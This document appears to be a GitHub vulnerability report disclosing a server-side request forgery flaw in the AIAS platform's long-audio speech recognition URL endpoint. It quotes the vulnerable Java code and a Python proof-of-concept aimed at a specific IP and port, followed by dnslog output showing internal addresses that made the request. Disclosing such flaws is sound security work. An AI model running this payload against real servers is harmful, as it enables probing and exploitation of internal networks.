SSRF - /api/asr/zhAsrForLongAudioUrl #54
Description
Summary
A SSRF vulnerability was discovered on /api/asr/zhAsrForLongAudioUrl, in latest version of AIAS. The target URI parameter for network requests is user-controllable and lacks sufficient security processing, resulting in an SSRF vulnerability that allows attackers to exploit this flaw to probe and exploit internal services of the target system.
Details
- SINK & SOURCE
// src/main/java/top/aias/platform/controller/AsrController.java#L247-L329
247: @ApiOperation("中文长语音识别-URL")
248: @GetMapping(
249: value = {"/zhAsrForLongAudioUrl"},
250: produces = {"application/json;charset=utf-8"}
251: )
252: public ResultBean zhAsrForLongAudioUrl(@RequestParam("url") String url) {
253: Path tempAudioFilePath = null;
254: Path tempConvertedAudioFilePath = null;
255:
256: ResultBean var51;
257: try {
258: String fileExtension = FileUtils.getFileExtension(url);
259: String tempFileName = UUID.randomUUID() + "." + fileExtension;
260: tempAudioFilePath = Files.createTempFile("audio_", tempFileName);
261: InputStream inputStream = (new URL(url)).openStream();
262: Throwable var7 = null;
263:
264: try {
265: Files.copy(inputStream, tempAudioFilePath, new CopyOption[]{StandardCopyOption.REPLACE_EXISTING});
266: } catch (Throwable var44) {
POC
import requests
from requests.sessions import Session
class CustomSession(Session):
def request(
self,
method,
url,
params = None,
data = None,
headers = None,
cookies = None,
files = None,
auth = None,
timeout = None,
allow_redirects = True,
proxies = None,
hooks = None,
stream = None,
verify = None,
cert = None,
json = None,
):
arg_names = (
'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout',
'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json'
)
local_variables = locals()
local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
local_variables['headers'] = local_variables.get('headers') or dict()
local_variables['headers'].update({'sec-ch-ua': '"Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Linux"', 'upgrade-insecure-requests': '1'})
return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
oob_url = 'http://$domain'
payload = {'url': oob_url}
response = requests.get('http://136.117.97.50:40020/api/asr/zhAsrForLongAudioUrl', params=payload, verify=False, allow_redirects=False)
print(response.status_code)
print(response.text)
# =================================== Poc End ====================================
- The executed result
Sandbox Execution Cancelled
============================== Dnslog ==============================
Request was made from IP: 172.17.70.218, 172.17.70.218, 172.17.64.16, 172.17.64.56, 172.17.79.252
====================================================================